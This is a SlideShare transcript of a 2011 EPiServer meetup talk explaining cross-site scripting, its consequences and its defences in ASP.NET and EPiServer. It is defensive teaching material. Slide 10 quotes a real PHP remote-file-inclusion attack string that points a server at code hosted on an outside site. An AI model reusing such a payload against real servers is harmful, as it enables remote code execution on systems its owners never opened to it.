Your SlideShare is downloading. ×
0
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

XSS - Presented at EPiServer Meetup in Oslo 25th May 2011

928

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
928
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. XSS – Cross site scripting
    Oslo EPiServer Meetup #7 – 25th May 2011
    © Creuna
    Slide 1
  • 2. Definition
    Cross site scripting is a form ofattackwheretheattacker is able to run arbitraryjavascriptcode in a web pageviewed by anotheruser
    XSS compromisestheclient side, not the server
    Butdependingonthe nature ofthewebsite it can be a serioussecurity risk
    © Creuna
    Slide 2
  • 3. Consequences
    XSS may be used to
    - Stealsessioncookies
    - Performany action thattheattackeduser has rights to do, maybeevenwithouthimknowing
    - Display false or modifiedcontent
    - XSS attacksmayspread like a software worm, for instance in a socialnetworksite. A user posts theattackingcodewhichinfects his friends, they post and so on.
    © Creuna
    Slide 3
  • 4. Two types of XSS
    Non persistent:
    A userfollows a malicious link or form from a dangerouswebsite, email, etc. The vulnerable websitewritesthe XSS attack to theresponse, and onlythisuser is affected
    Persistent:
    The XSS attackcode is storedonthe vulnerable web site, for instance in a usercomment. All subsequentusersofthe web sitemay be exposed to the XSS attack
    © Creuna
    Slide 4
  • 5. Wheredoesthexssattackcome from?
    All content from insecuresources is potentiallydangerous
    - Form submissions
    - Urls
    - All othersources, RSS feeds, integrated systems, etc.
    © Creuna
    Slide 5
  • 6. Form submissions
    DangerouscontentmaycomethroughPOST variables
    Rememberthat POST requests do not necessarilyoriginate from a form on a pageyouservedtheuser, an attackermaycraft a webpage or requesttargetingyour web site
    DEMO
    (Demo showed a simple ASP.NET form writing a submittedtext back to thepageon postback. By defaultdangerous POST variables result in an exception in ASP.NET, so wearecovered, right? Next demo showed same principle in a minimallymodified EPiServer demo site, and the XSS attackwassuccessful. EPiServer turns off ASP.NETs input verification in itsdefaultconfiguration.)
    © Creuna
    Slide 6
  • 7. Url input
    Do youwritethevalueofRequest.Url back to yourresponse?
    Yes, even ASP.NET itselfdoesthat
    DEMO
    (Demo showedusing a url with XSS in it in a standard ASP.NET web site, and wegot an exception like withthe POST attack. EPiServer proved vulnerable again.)
    © Creuna
    Slide 7
  • 8. EPiServer
    ASP.NET is normallywellsecuredagainst XSS
    But EPiServer turnsthis feature off by default
    We must alwaysgiveexternal input an extrathought in EPiServer, ASP.NETs normal safetynet is turned off!
    © Creuna
    Slide 8
  • 9. How do wesecureourselvesagains XSS?
    Always make sure to escape data from unsecuresourcesifyouaregoing to write it to theresponse
    This alsoapplies to urls, like Request.Url
    Do not trust yourownability to foresee all scenarios so do not writethecode for thisyourself
    Use a welltested and reviewedframework
    For instance Microsofts AntiXSS: http://wpl.codeplex.com/
    © Creuna
    Slide 9
  • 10. Are youusing PHP?
    As PHP is a script language, similarattacksmayactuallycompromisethe server side
    Real world example from oneofourprojects:
    <form method="post" action="/no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif”id="aspnetForm">
    This attackwould make the server run the PHP code in test.gif, which is not a picturebutPHP code
    The websitebungalowsdemo.info is probablyunknowinglyattacked and used to host theattackcode
    © Creuna
    Slide 10
  • 11. External script files
    Do youincludeexternal script files in your web site?
    For instance, do youuseGoogles/Microsofts CDN for javascript?
    Real world example, web statisticstool:
    <script src=http://res.xtractor.no/x.jstype="text/javascript"></script>
    © Creuna
    Slide 11
  • 12. External script files
    Ifyoureferenceexternal script files yougiveanotherdomain/sourcethe right to run javascriptonyour web site
    Of courseyoucan trust Googles or Microsofts CDN to deliver proper code
    But a differentdomainmay be vulnerable to DNS attacks
    An attackermaymanipulate DNS onthelocalmachine or network to deliverexternal scripts from a differentsource
    If all referenced script files are from the same domain as theviewed web pageyouavoidthisvulnerability
    © Creuna
    Slide 12
  • 13. Questions?
    © Creuna
    Slide 13

×